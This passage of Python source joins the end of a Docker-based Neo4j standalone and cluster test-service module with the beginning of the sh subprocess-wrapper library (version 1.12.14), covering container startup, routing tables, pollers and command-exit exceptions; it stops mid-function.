self.container.reload()
if self.container.status == "running":
try:
self.ping(timeout)
except OSError:
self.container.reload()
state = self.container.attrs["State"]
if state["Status"] == "exited":
self.ready = -1
log.error("Machine %r exited with code %r",
self.spec.fq_name, state["ExitCode"])
for line in self.container.logs().splitlines():
log.error("> %s" % line.decode("utf-8"))
else:
log.error("Machine %r did not become available "
"within %rs", self.spec.fq_name, timeout)
else:
self.ready = 1
else:
log.error("Machine %r is not running (status=%r)",
self.spec.fq_name, self.container.status)
for line in self.container.logs().splitlines():
log.error("> %s" % line.decode("utf-8"))
def stop(self, timeout=None):
log.info("Stopping machine %r", self.spec.fq_name)
self.container.stop(timeout=timeout)
self.container.remove(force=True)
class Neo4jRoutingTable:
""" Address lists for a Neo4j service.
"""
def __init__(self, routers=()):
self.routers = AddressList(routers)
self.readers = AddressList()
self.writers = AddressList()
self.last_updated = 0
self.ttl = 0
def update(self, server_lists, ttl):
new_routers = AddressList()
new_readers = AddressList()
new_writers = AddressList()
for server_list in server_lists:
role = server_list["role"]
addresses = map(Address.parse, server_list["addresses"])
if role == "ROUTE":
new_routers[:] = addresses
elif role == "READ":
new_readers[:] = addresses
elif role == "WRITE":
new_writers[:] = addresses
self.routers[:] = new_routers
self.readers[:] = new_readers
self.writers[:] = new_writers
self.last_updated = monotonic()
self.ttl = ttl
def expired(self):
age = monotonic() - self.last_updated
return age >= self.ttl
def age(self):
age = monotonic() - self.last_updated
m, s = divmod(age, 60)
parts = []
if m:
parts.append("{:.0f}m".format(m))
parts.append("{:.0f}s".format(s))
if age >= self.ttl:
parts.append("(expired)")
return " ".join(parts)
class Neo4jService:
""" A Neo4j database management service.
"""
default_image = NotImplemented
default_bolt_port = 7687
default_http_port = 7474
default_https_port = 7473
default_debug_port = 5005
snapshot_host = "live.neo4j-build.io"
snapshot_build_config_id = "Neo4j40_Docker"
snapshot_build_url = ("https://{}/repository/download/{}/"
"lastSuccessful".format(snapshot_host,
snapshot_build_config_id))
def __new__(cls, name=None, image=None, auth=None,
n_cores=None, n_replicas=None,
bolt_port=None, http_port=None, https_port=None,
debug_port=None, debug_suspend=None,
dir_spec=None, config=None, env=None):
if n_cores:
return object.__new__(Neo4jClusterService)
else:
return object.__new__(Neo4jStandaloneService)
@classmethod
def _random_name(cls):
return "".join(choice("bcdfghjklmnpqrstvwxz") for _ in range(7))
# noinspection PyUnusedLocal
def __init__(self, name=None, image=None, auth=None,
n_cores=None, n_replicas=None,
bolt_port=None, http_port=None, https_port=None,
debug_port=None, debug_suspend=None, dir_spec=None,
config=None, env=None):
from docker import DockerClient
self.name = name or self._random_name()
self.docker = DockerClient.from_env(version="auto")
self.image = resolve_image(image or self.default_image)
self.auth = Auth(*auth) if auth else make_auth()
if self.auth.user != "neo4j":
raise ValueError("Auth user must be 'neo4j' or empty")
self.machines = {}
self.network = None
self.routing_tables = {"system": Neo4jRoutingTable()}
self.console = None
def __enter__(self):
try:
self.start(timeout=300)
except KeyboardInterrupt:
self.stop(timeout=300)
raise
else:
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
def _get_machine_by_address(self, address):
address = Address((address.host, address.port_number))
for spec, machine in self.machines.items():
if spec.bolt_address == address:
return machine
def routers(self):
if self.routing_tables["system"].routers:
return list(map(self._get_machine_by_address,
self.routing_tables["system"].routers))
else:
return list(self.machines.values())
def readers(self, tx_context=None):
self.update_routing_info(tx_context, force=False)
return list(map(self._get_machine_by_address,
self.routing_tables[tx_context].readers))
def writers(self, tx_context=None):
self.update_routing_info(tx_context, force=False)
return list(map(self._get_machine_by_address,
self.routing_tables[tx_context].writers))
def ttl(self, context):
return self.routing_tables[context].ttl
def _has_valid_routing_table(self, tx_context):
return (tx_context in self.routing_tables and
not self.routing_tables[tx_context].expired())
def _for_each_machine(self, f):
threads = []
for spec, machine in self.machines.items():
thread = Thread(target=f(machine))
thread.daemon = True
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def start(self, timeout=None):
log.info("Starting service %r with image %r", self.name, self.image)
self.network = self.docker.networks.create(self.name)
self._for_each_machine(lambda machine: machine.start)
if timeout is not None:
self.await_started(timeout)
def await_started(self, timeout):
def wait(machine):
machine.await_started(timeout=timeout)
self._for_each_machine(wait)
if all(machine.ready == 1 for spec, machine in self.machines.items()):
log.info("Service %r available", self.name)
else:
raise RuntimeError("Service %r unavailable - "
"some machines failed", self.name)
def stop(self, timeout=None):
log.info("Stopping service %r", self.name)
def _stop(machine):
machine.stop(timeout)
self._for_each_machine(_stop)
if self.network:
self.network.remove()
@property
def addresses(self):
return AddressList(chain(*(r.addresses for r in self.routers())))
@classmethod
def find_and_stop(cls, service_name):
from docker import DockerClient
docker = DockerClient.from_env(version="auto")
for container in docker.containers.list(all=True):
if container.name.endswith(".{}".format(service_name)):
container.stop()
container.remove(force=True)
docker.networks.get(service_name).remove()
def update_routing_info(self, tx_context, *, force=False):
if self._has_valid_routing_table(tx_context) and not force:
return None
with Connection.open(*self.addresses, auth=self.auth) as cx:
routing_context = {}
records = []
if cx.bolt_version >= 4:
run = cx.run("CALL dbms.cluster.routing."
"getRoutingTable($rc, $tc)", {
"rc": routing_context,
"tc": tx_context,
})
else:
run = cx.run("CALL dbms.cluster.routing."
"getRoutingTable($rc)", {
"rc": routing_context,
})
cx.pull(-1, -1, records)
cx.send_all()
cx.fetch_all()
if run.error:
log.debug(run.error.args[0])
return False
if records:
ttl, server_lists = records[0]
rt = self.routing_tables.setdefault(tx_context,
Neo4jRoutingTable())
rt.update(server_lists, ttl)
return True
else:
return False
def run_console(self):
self.console = Neo4jConsole(self)
self.console.invoke("env")
self.console.run()
def env(self):
addr = AddressList(chain(*(r.addresses for r in self.routers())))
auth = "{}:{}".format(self.auth.user, self.auth.password)
return {
"BOLT_SERVER_ADDR": str(addr),
"NEO4J_AUTH": auth,
}
class Neo4jStandaloneService(Neo4jService):
default_image = "neo4j:latest"
def __init__(self, name=None, image=None, auth=None,
n_cores=None, n_replicas=None,
bolt_port=None, http_port=None, https_port=None, debug_port=None,
debug_suspend=None, dir_spec=None, config=None, env=None):
super().__init__(name, image, auth,
n_cores, n_replicas,
bolt_port, http_port, https_port,
dir_spec, config, env)
spec = Neo4jMachineSpec(
name="a",
service_name=self.name,
bolt_port=bolt_port or self.default_bolt_port,
http_port=http_port or self.default_http_port,
https_port=https_port or self.default_https_port,
debug_opts=debug_opts_type(debug_suspend, debug_port),
dir_spec=dir_spec,
config=config,
env=env,
)
self.machines[spec] = Neo4jMachine(
spec,
self.image,
auth=self.auth,
)
class Neo4jClusterService(Neo4jService):
default_image = "neo4j:enterprise"
# The minimum and maximum number of cores permitted
min_cores = 3
max_cores = 7
# The minimum and maximum number of read replicas permitted
min_replicas = 0
max_replicas = 9
default_bolt_port = 17601
default_http_port = 17401
default_debug_port = 15001
@classmethod
def _port_range(cls, base_port, count):
if base_port is None:
return [None] * count
else:
return range(base_port, base_port + count)
def __init__(self, name=None, image=None, auth=None,
n_cores=None, n_replicas=None,
bolt_port=None, http_port=None, https_port=None, debug_port=None,
debug_suspend=None, dir_spec=None, config=None, env=None):
super().__init__(name, image, auth,
n_cores, n_replicas,
bolt_port, http_port, https_port, debug_port,
debug_suspend, dir_spec, config, env)
n_cores = n_cores or self.min_cores
n_replicas = n_replicas or self.min_replicas
if not self.min_cores <= n_cores <= self.max_cores:
raise ValueError("A cluster must have been {} and {} "
"cores".format(self.min_cores, self.max_cores))
if not self.min_replicas <= n_replicas <= self.max_replicas:
raise ValueError("A cluster must have been {} and {} "
"read replicas".format(self.min_replicas,
self.max_replicas))
core_bolt_port_range = self._port_range(
bolt_port or self.default_bolt_port, self.max_cores)
core_http_port_range = self._port_range(
http_port or self.default_http_port, self.max_cores)
core_https_port_range = self._port_range(
https_port or self.default_https_port, self.max_cores)
core_debug_port_range = self._port_range(debug_port, self.max_cores)
self.free_core_machine_specs = [
Neo4jCoreMachineSpec(
name=chr(97 + i),
service_name=self.name,
bolt_port=core_bolt_port_range[i],
http_port=core_http_port_range[i],
https_port=core_https_port_range[i],
# Only suspend first core in cluster, otherwise cluster won't form until debuggers
# connect to all of them.
debug_opts=debug_opts_type(debug_suspend if i == 0 else False, core_debug_port_range[i]),
dir_spec=dir_spec,
config=dict(config or {}, **{
"causal_clustering.minimum_core_cluster_size_at_formation":
n_cores or self.min_cores,
"causal_clustering.minimum_core_cluster_size_at_runtime":
self.min_cores,
}),
env=env,
)
for i in range(self.max_cores)
]
replica_bolt_port_range = self._port_range(
ceil(core_bolt_port_range.stop / 10) * 10 + 1, self.max_replicas)
replica_http_port_range = self._port_range(
ceil(core_http_port_range.stop / 10) * 10 + 1, self.max_replicas)
replica_https_port_range = self._port_range(
ceil(core_https_port_range.stop / 10) * 10 + 1, self.max_replicas)
if debug_port:
replica_debug_port_range = self._port_range(
ceil(core_debug_port_range.stop / 10) * 10 + 1, self.max_replicas)
else:
replica_debug_port_range = self._port_range(None, self.max_replicas)
self.free_replica_machine_specs = [
Neo4jReplicaMachineSpec(
name=chr(49 + i),
service_name=self.name,
bolt_port=replica_bolt_port_range[i],
http_port=replica_http_port_range[i],
https_port=replica_https_port_range[i],
# Only suspend first core in cluster, otherwise cluster won't form until debuggers
# connect to all of them.
debug_opts=debug_opts_type(debug_suspend if i == 0 else False, replica_debug_port_range[i]),
dir_spec=dir_spec,
config=config,
env=env,
)
for i in range(self.max_replicas)
]
# Add core machine specs
for i in range(n_cores or self.min_cores):
spec = self.free_core_machine_specs.pop(0)
self.machines[spec] = None
# Add replica machine specs
for i in range(n_replicas or self.min_replicas):
spec = self.free_replica_machine_specs.pop(0)
self.machines[spec] = None
self._boot_machines()
def _boot_machines(self):
discovery_addresses = [spec.discovery_address for spec in self.machines
if isinstance(spec, Neo4jCoreMachineSpec)]
for spec, machine in self.machines.items():
if machine is None:
spec.config.update({
"causal_clustering.initial_discovery_members":
",".join(discovery_addresses),
})
self.machines[spec] = Neo4jMachine(spec, self.image, self.auth)
def cores(self):
return [machine for spec, machine in self.machines.items()
if isinstance(spec, Neo4jCoreMachineSpec)]
def replicas(self):
return [machine for spec, machine in self.machines.items()
if isinstance(spec, Neo4jReplicaMachineSpec)]
def routers(self):
if self.routing_tables["system"].routers:
return list(map(self._get_machine_by_address,
self.routing_tables["system"].routers))
else:
return list(self.cores())
def run_console(self):
self.console = Neo4jClusterConsole(self)
self.console.run()
def add_core(self):
""" Add new core server
"""
if len(self.cores()) < self.max_cores:
spec = self.free_core_machine_specs.pop(0)
self.machines[spec] = None
self._boot_machines()
self.machines[spec].start()
self.machines[spec].await_started(300)
else:
raise RuntimeError("A maximum of {} cores "
"is permitted".format(self.max_cores))
def add_replica(self):
""" Add new replica server
"""
if len(self.replicas()) < self.max_replicas:
spec = self.free_replica_machine_specs.pop(0)
self.machines[spec] = None
self._boot_machines()
self.machines[spec].start()
self.machines[spec].await_started(300)
else:
raise RuntimeError("A maximum of {} replicas "
"is permitted".format(self.max_replicas))
def _remove_machine(self, spec):
machine = self.machines[spec]
del self.machines[spec]
machine.stop()
if isinstance(spec, Neo4jCoreMachineSpec):
self.free_core_machine_specs.append(spec)
elif isinstance(spec, Neo4jReplicaMachineSpec):
self.free_replica_machine_specs.append(spec)
def remove(self, name):
""" Remove a server by name (e.g. 'a', 'a.fbe340d').
"""
found = 0
for spec, machine in list(self.machines.items()):
if name in (spec.name, spec.fq_name):
self._remove_machine(spec)
found += 1
return found
def reboot(self, name):
found = 0
for spec, machine in list(self.machines.items()):
if name in (spec.name, spec.fq_name):
machine.restart()
machine.await_started(300)
found += 1
return found
|
sh.py
|
"""
http://amoffat.github.io/sh/
"""
#===============================================================================
# Copyright (C) 2011-2017 by Andrew Moffat
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#===============================================================================
__version__ = "1.12.14"
__project_url__ = "https://github.com/amoffat/sh"
import platform
if "windows" in platform.system().lower(): # pragma: no cover
raise ImportError("sh %s is currently only supported on linux and osx. \
please install pbs 0.110 (http://pypi.python.org/pypi/pbs) for windows \
support." % __version__)
import sys
IS_PY3 = sys.version_info[0] == 3
MINOR_VER = sys.version_info[1]
IS_PY26 = sys.version_info[0] == 2 and MINOR_VER == 6
import traceback
import os
import re
import time
import getpass
from types import ModuleType, GeneratorType
from functools import partial
import inspect
import tempfile
import warnings
import stat
import glob as glob_module
import ast
from contextlib import contextmanager
import pwd
import errno
from io import UnsupportedOperation, open as fdopen
from locale import getpreferredencoding
DEFAULT_ENCODING = getpreferredencoding() or "UTF-8"
# normally i would hate this idea of using a global to signify whether we are
# running tests, because it breaks the assumption that what is running in the
# tests is what will run live, but we ONLY use this in a place that has no
# serious side-effects that could change anything. as long as we do that, it
# should be ok
RUNNING_TESTS = bool(int(os.environ.get("SH_TESTS_RUNNING", "0")))
FORCE_USE_SELECT = bool(int(os.environ.get("SH_TESTS_USE_SELECT", "0")))
if IS_PY3:
from io import StringIO
ioStringIO = StringIO
from io import BytesIO as cStringIO
iocStringIO = cStringIO
from queue import Queue, Empty
# for some reason, python 3.1 removed the builtin "callable", wtf
if not hasattr(__builtins__, "callable"):
def callable(ob):
return hasattr(ob, "__call__")
else:
from StringIO import StringIO
from cStringIO import OutputType as cStringIO
from io import StringIO as ioStringIO
from io import BytesIO as iocStringIO
from Queue import Queue, Empty
try:
from shlex import quote as shlex_quote # here from 3.3 onward
except ImportError:
from pipes import quote as shlex_quote # undocumented before 2.7
IS_OSX = platform.system() == "Darwin"
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
SH_LOGGER_NAME = __name__
import errno
import pty
import termios
import signal
import gc
import select
import threading
import tty
import fcntl
import struct
import resource
from collections import deque
import logging
import weakref
# a re-entrant lock for pushd. this way, multiple threads that happen to use
# pushd will all see the current working directory for the duration of the
# with-context
PUSHD_LOCK = threading.RLock()
if hasattr(inspect, "getfullargspec"):
def get_num_args(fn):
return len(inspect.getfullargspec(fn).args)
else:
def get_num_args(fn):
return len(inspect.getargspec(fn).args)
if IS_PY3:
raw_input = input
unicode = str
basestring = str
long = int
_unicode_methods = set(dir(unicode()))
HAS_POLL = hasattr(select, "poll")
POLLER_EVENT_READ = 1
POLLER_EVENT_WRITE = 2
POLLER_EVENT_HUP = 4
POLLER_EVENT_ERROR = 8
# here we use an use a poller interface that transparently selects the most
# capable poller (out of either select.select or select.poll). this was added
# by zhangyafeikimi when he discovered that if the fds created internally by sh
# numbered > 1024, select.select failed (a limitation of select.select). this
# can happen if your script opens a lot of files
if HAS_POLL and not FORCE_USE_SELECT:
class Poller(object):
def __init__(self):
self._poll = select.poll()
# file descriptor <-> file object bidirectional maps
self.fd_lookup = {}
self.fo_lookup = {}
def __nonzero__(self):
return len(self.fd_lookup) != 0
def __len__(self):
return len(self.fd_lookup)
def _set_fileobject(self, f):
if hasattr(f, "fileno"):
fd = f.fileno()
self.fd_lookup[fd] = f
self.fo_lookup[f] = fd
else:
self.fd_lookup[f] = f
self.fo_lookup[f] = f
def _remove_fileobject(self, f):
if hasattr(f, "fileno"):
fd = f.fileno()
del self.fd_lookup[fd]
del self.fo_lookup[f]
else:
del self.fd_lookup[f]
del self.fo_lookup[f]
def _get_file_descriptor(self, f):
return self.fo_lookup.get(f)
def _get_file_object(self, fd):
return self.fd_lookup.get(fd)
def _register(self, f, events):
# f can be a file descriptor or file object
self._set_fileobject(f)
fd = self._get_file_descriptor(f)
self._poll.register(fd, events)
def register_read(self, f):
self._register(f, select.POLLIN | select.POLLPRI)
def register_write(self, f):
self._register(f, select.POLLOUT)
def register_error(self, f):
self._register(f, select.POLLERR | select.POLLHUP | select.POLLNVAL)
def unregister(self, f):
fd = self._get_file_descriptor(f)
self._poll.unregister(fd)
self._remove_fileobject(f)
def poll(self, timeout):
if timeout is not None:
# convert from seconds to milliseconds
timeout *= 1000
changes = self._poll.poll(timeout)
results = []
for fd, events in changes:
f = self._get_file_object(fd)
if events & (select.POLLIN | select.POLLPRI):
results.append((f, POLLER_EVENT_READ))
elif events & (select.POLLOUT):
results.append((f, POLLER_EVENT_WRITE))
elif events & (select.POLLHUP):
results.append((f, POLLER_EVENT_HUP))
elif events & (select.POLLERR | select.POLLNVAL):
results.append((f, POLLER_EVENT_ERROR))
return results
else:
class Poller(object):
def __init__(self):
self.rlist = []
self.wlist = []
self.xlist = []
def __nonzero__(self):
return len(self.rlist) + len(self.wlist) + len(self.xlist) != 0
def __len__(self):
return len(self.rlist) + len(self.wlist) + len(self.xlist)
def _register(self, f, l):
if f not in l:
l.append(f)
def _unregister(self, f, l):
if f in l:
l.remove(f)
def register_read(self, f):
self._register(f, self.rlist)
def register_write(self, f):
self._register(f, self.wlist)
def register_error(self, f):
self._register(f, self.xlist)
def unregister(self, f):
self._unregister(f, self.rlist)
self._unregister(f, self.wlist)
self._unregister(f, self.xlist)
def poll(self, timeout):
_in, _out, _err = select.select(self.rlist, self.wlist, self.xlist, timeout)
results = []
for f in _in:
results.append((f, POLLER_EVENT_READ))
for f in _out:
results.append((f, POLLER_EVENT_WRITE))
for f in _err:
results.append((f, POLLER_EVENT_ERROR))
return results
def encode_to_py3bytes_or_py2str(s):
""" takes anything and attempts to return a py2 string or py3 bytes. this
is typically used when creating command + arguments to be executed via
os.exec* """
fallback_encoding = "utf8"
if IS_PY3:
# if we're already bytes, do nothing
if isinstance(s, bytes):
pass
else:
s = str(s)
try:
s = bytes(s, DEFAULT_ENCODING)
except UnicodeEncodeError:
s = bytes(s, fallback_encoding)
else:
# attempt to convert the thing to unicode from the system's encoding
try:
s = unicode(s, DEFAULT_ENCODING)
# if the thing is already unicode, or it's a number, it can't be
# coerced to unicode with an encoding argument, but if we leave out
# the encoding argument, it will convert it to a string, then to unicode
except TypeError:
s = unicode(s)
# now that we have guaranteed unicode, encode to our system encoding,
# but attempt to fall back to something
try:
s = s.encode(DEFAULT_ENCODING)
except:
s = s.encode(fallback_encoding, "replace")
return s
def _indent_text(text, num=4):
lines = []
for line in text.split("\n"):
line = (" " * num) + line
lines.append(line)
return "\n".join(lines)
class ForkException(Exception):
def __init__(self, orig_exc):
tmpl = """
Original exception:
===================
%s
"""
msg = tmpl % _indent_text(orig_exc)
Exception.__init__(self, msg)
class ErrorReturnCodeMeta(type):
""" a metaclass which provides the ability for an ErrorReturnCode (or
derived) instance, imported from one sh module, to be considered the
subclass of ErrorReturnCode from another module. this is mostly necessary
in the tests, where we do assertRaises, but the ErrorReturnCode that the
program we're testing throws may not be the same class that we pass to
assertRaises
"""
def __subclasscheck__(self, o):
other_bases = set([b.__name__ for b in o.__bases__])
return self.__name__ in other_bases or o.__name__ == self.__name__
class ErrorReturnCode(Exception):
__metaclass__ = ErrorReturnCodeMeta
""" base class for all exceptions as a result of a command's exit status
being deemed an error. this base class is dynamically subclassed into
derived classes with the format: ErrorReturnCode_NNN where NNN is the exit
code number. the reason for this is it reduces boiler plate code when
testing error return codes:
try:
some_cmd()
except ErrorReturnCode_12:
print("couldn't do X")
vs:
try:
some_cmd()
except ErrorReturnCode as e:
if e.exit_code == 12:
print("couldn't do X")
it's not much of a savings, but i believe it makes the code easier to read """
truncate_cap = 750
def __init__(self, full_cmd, stdout, stderr, truncate=True):
self.full_cmd = full_cmd
self.stdout = stdout
self.stderr = stderr
exc_stdout = self.stdout
if truncate:
exc_stdout = exc_stdout[:self.truncate_cap]
out_delta = len(self.stdout) - len(exc_stdout)
if out_delta:
exc_stdout += ("... (%d more, please see e.stdout)" % out_delta).encode()
exc_stderr = self.stderr
if truncate:
exc_stderr = exc_stderr[:self.truncate_cap]
err_delta = len(self.stderr) - len(exc_stderr)
if err_delta:
exc_stderr += ("... (%d more, please see e.stderr)" % err_delta).encode()
msg_tmpl = unicode("\n\n RAN: {cmd}\n\n STDOUT:\n{stdout}\n\n STDERR:\n{stderr}")
msg = msg_tmpl.format(
cmd=self.full_cmd,
stdout=exc_stdout.decode(DEFAULT_ENCODING, "replace"),
stderr=exc_stderr.decode(DEFAULT_ENCODING, "replace")
)
super(ErrorReturnCode, self).__init__(msg)
class SignalException(ErrorReturnCode): pass
class TimeoutException(Exception):
""" the exception thrown when a command is killed because a specified
timeout (via _timeout) was hit """
def __init__(self, exit_code):
self.exit_code = exit_code
super(Exception, self).__init__()
SIGNALS_THAT_SHOULD_THROW_EXCEPTION = set((
signal.SIGABRT,
signal.SIGBUS,
signal.SIGFPE,
signal.SIGILL,
signal.SIGINT,
signal.SIGKILL,
signal.SIGPIPE,
signal.SIGQUIT,
signal.SIGSEGV,
signal.SIGTERM,
signal.SIGSYS,
))
# we subclass AttributeError because:
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
class CommandNotFound(AttributeError): pass
rc_exc_regex = re.compile(r"(ErrorReturnCode|SignalException)_((\d+)|SIG[a-zA-Z]+)")
rc_exc_cache = {}
SIGNAL_MAPPING = {}
for k,v in signal.__dict__.items():
if re.match(r"SIG[a-zA-Z]+", k):
SIGNAL_MAPPING[v] = k
def get_exc_from_name(name):
""" takes an exception name, like:
ErrorReturnCode_1
SignalException_9
SignalException_SIGHUP
and returns the corresponding exception. this is primarily used for
importing exceptions from sh into user code, for instance, to capture those
exceptions """
exc = None
try:
return rc_exc_cache[name]
except KeyError:
m = rc_exc_regex.match(name)
if m:
base = m.group(1)
rc_or_sig_name = m.group(2)
if base == "SignalException":
try:
rc = -int(rc_or_sig_name)
except ValueError:
rc = -getattr(signal, rc_or_sig_name)
else:
rc = int(rc_or_sig_name)
exc = get_rc_exc(rc)
return exc
def get_rc_exc(rc):
""" takes a exit code or negative signal number and produces an exception
that corresponds to that return code. positive return codes yield
ErrorReturnCode exception, negative return codes yield SignalException
we also cache the generated exception so that only one signal of that type
exists, preserving identity """
try:
return rc_exc_cache[rc]
except KeyError:
pass
if rc > 0:
name = "ErrorReturnCode_%d" % rc
base = ErrorReturnCode
else:
signame = SIGNAL_MAPPING[abs(rc)]
name = "SignalException_" + signame
base = SignalException
exc = ErrorReturnCodeMeta(name, (base,), {"exit_code": rc})
rc_exc_cache[rc] = exc
return exc
# we monkey patch glob. i'm normally generally against monkey patching, but i
# decided to do this really un-intrusive patch because we need a way to detect
# if a list that we pass into an sh command was generated from glob. the reason
# being that glob returns an empty list if a pattern is not found, and so
# commands will treat the empty list as no arguments, which can be a problem,
# ie:
#
# ls(glob("*.ojfawe"))
#
# ^ will show the contents of your home directory, because it's essentially
# running ls([]) which, as a process, is just "ls".
#
# so we subclass list and monkey patch the glob function. nobody should be the
# wiser, but we'll have results that we can make some determinations on
_old_glob = glob_module.glob
class GlobResults(list):
def __init__(self, path, results):
self.path = path
list.__init__(self, results)
def glob(path, *args, **kwargs):
expanded = GlobResults(path, _old_glob(path, *args, **kwargs))
return expanded
glob_module.glob = glob
def which(program, paths=None):
""" takes a program name or full path, plus an optional collection of search
paths, and returns the full path of the requested executable. if paths is
specified, it is the entire list of search paths, and the PATH env is not
used at all. otherwise, PATH env is used to look for the program """
def is_exe(fpath):
return (os.path.exists(fpath) and
os.access(fpath, os.X_OK) and
os.path.isfile(os.path.realpath(fpath)))
found_path = None
fpath, fname = os.path.split(program)
# if there's a path component, then we've specified a path to the program,
# and we should just test if that program is executable. if it is, return
if fpath:
program = os.path.abspath(os.path.expanduser(program))
if is_exe(program):
found_path = program
# otherwise, we've just passed in the program name, and we need to search
# the paths to find where it actually lives
else:
paths_to_search = []
if isinstance(paths, (tuple, list)):
paths_to_search.extend(paths)
else:
env_paths = os.environ.get("PATH", "").split(os.pathsep)
paths_to_search.extend(env_paths)
for path in paths_to_search:
exe_file = os.path.join(path, program)
if is_exe(exe_file):
found_path = exe_file
break
return found_path
def resolve_command_path(program):
path = which(program)
if not path:
# our actual command might have a dash in it, but we can't call
# that from python (we have to use underscores), so we'll check
# if a dash version of our underscore command exists and use that
# if it does
if "_" in program:
path = which(program.replace("_", "-"))
if not path:
return None
return path
def resolve_command(name, baked_args=None):
path = resolve_command_path(name)
cmd = None
if path:
cmd = Command(path)
if baked_args:
cmd = cmd.bake(**baked_args)
return cmd
class Logger(object):
""" provides a memory-inexpensive logger. a gotcha about python's builtin
logger is that logger objects are never garbage collected. if you create a
thousand loggers with unique names, they'll sit there in memory until your
script is done. with sh, it's easy to create loggers with unique names if
we want our loggers to include our command arguments. for example, these
are all unique loggers:
ls -l
ls -l /tmp
ls /tmp
so instead of creating unique loggers, and without sacrificing logging
output, we use this class, which maintains as part of its state, the logging
"context", which will be the very unique name. this allows us to get a
logger with a very general name, eg: "command", and have a unique name
appended to it via the context, eg: "ls -l /tmp" """
def __init__(self, name, context=None):
self.name = name
self.log = logging.getLogger("%s.%s" % (SH_LOGGER_NAME, name))
self.set_context(context)
def _format_msg(self, msg, *args):
if self.context:
msg = "%s: %s" % (self.context, msg)
return msg % args
def set_context(self, context):
if context:
context = context.replace("%", "%%")
self.context = context or ""
def get_child(self, name, context):
new_name = self.name + "." + name
new_context = self.context + "." + context
l = Logger(new_name, new_context)
return l
def info(self, msg, *args):
self.log.info(self._format_msg(msg, *args))
def debug(self, msg, *args):
self.log.debug(self._format_msg(msg, *args))
def error(self, msg, *args):
self.log.error(self._format_msg(msg, *args))
def exception(self, msg, *args):
self.log.exception(self._format_msg(msg, *args))
def default_logger_str(cmd, call_args, pid=None):
if pid:
s = "<Command %r, pid %d>" % (cmd, pid)
else:
s = "<Command %r>" % cmd
return s
class RunningCommand(object):
""" this represents an executing Command object. it is returned as the
result of __call__() being executed on a Command instance. this creates a
reference to a OProc instance, which is a low-level wrapper around the
process that was exec'd
this is the class that gets manipulated the most by user code, and so it
implements various convenience methods and logical mechanisms for the
underlying process. for example, if a user tries to access a
backgrounded-process's stdout/err, the RunningCommand object is smart enough
to know to wait() on the process to finish first. and when the process
finishes, RunningCommand is smart enough to translate exit codes to
exceptions. """
# these are attributes that we allow to passthrough to OProc for
_OProc_attr_whitelist = set((
"signal",
"terminate",
"kill",
"kill_group",
"signal_group",
"pid",
"sid",
"pgid",
"ctty",
"input_thread_exc",
"output_thread_exc",
"bg_thread_exc",
))
def __init__(self, cmd, call_args, stdin, stdout, stderr):
"""
cmd is an array, where each element is encoded as bytes (PY3) or str
(PY2)
"""
# self.ran is used for auditing what actually ran. for example, in
# exceptions, or if you just want to know what was ran after the
# command ran
#
# here we're making a consistent unicode string out if our cmd.
# we're also assuming (correctly, i think) that the command and its
# arguments are the encoding we pass into _encoding, which falls back to
# the system's encoding
enc = call_args["encoding"]
self.ran = " ".join([shlex_quote(arg.decode(enc, "ignore")) for arg in cmd])
self.call_args = call_args
self.cmd = cmd
self.process = None
self._process_completed = False
should_wait = True
spawn_process = True
# this is used to track if we've already raised StopIteration, and if we
# have, raise it immediately again if the user tries to call next() on
# us. https://github.com/amoffat/sh/issues/273
self._stopped_iteration = False
# with contexts shouldn't run at all yet, they prepend
# to every command in the context
if call_args["with"]:
spawn_process = False
get_prepend_stack().append(self)
if call_args["piped"] or call_args["iter"] or call_args["iter_noblock"]:
should_wait = False
# we're running in the background, return self and let us lazily
# evaluate
if call_args["bg"]:
should_wait = False
# redirection
if call_args["err_to_out"]:
stderr = OProc.STDOUT
done_callback = call_args["done"]
if done_callback:
call_args["done"] = partial(done_callback, self)
# set up which stream should write to the pipe
# TODO, make pipe None by default and limit the size of the Queue
# in oproc.OProc
pipe = OProc.STDOUT
if call_args["iter"] == "out" or call_args["iter"] is True:
pipe = OProc.STDOUT
elif call_args["iter"] == "err":
pipe = OProc.STDERR
if call_args["iter_noblock"] == "out" or call_args["iter_noblock"] is True:
pipe = OProc.STDOUT
elif call_args["iter_noblock"] == "err":
pipe = OProc.STDERR
# there's currently only one case where we wouldn't spawn a child
# process, and that's if we're using a with-context with our command
self._spawned_and_waited = False
if spawn_process:
log_str_factory = call_args["log_msg"] or default_logger_str
logger_str = log_str_factory(self.ran, call_args)
self.log = Logger("command", logger_str)
self.log.info("starting process")
if should_wait:
self._spawned_and_waited = True
# this lock is needed because of a race condition where a background
# thread, created in the OProc constructor, may try to access
# self.process, but it has not been assigned yet
process_assign_lock = threading.Lock()
with process_assign_lock:
self.process = OProc(self, self.log, cmd, stdin, stdout, stderr,
self.call_args, pipe, process_assign_lock)
logger_str = log_str_factory(self.ran, call_args, self.process.pid)
self.log.set_context(logger_str)
self.log.info("process started")
if should_wait:
self.wait()
def wait(self):
""" waits for the running command to finish. this is called on all
running commands, eventually, except for ones that run in the background
"""
if not self._process_completed:
self._process_completed = True
exit_code = self.process.wait()
if self.process.timed_out:
# if we timed out, our exit code represents a signal, which is
# negative, so let's make it positive to store in our
# TimeoutException
raise TimeoutException(-exit_code)
else:
self.handle_command_exit_code(exit_code)
# if an iterable command is using an instance of OProc for its stdin,
# wait on it. the process is probably set to "piped", which means it
# won't be waited on, which means exceptions won't propagate up to the
# main thread. this allows them to bubble up
if self.process._stdin_process:
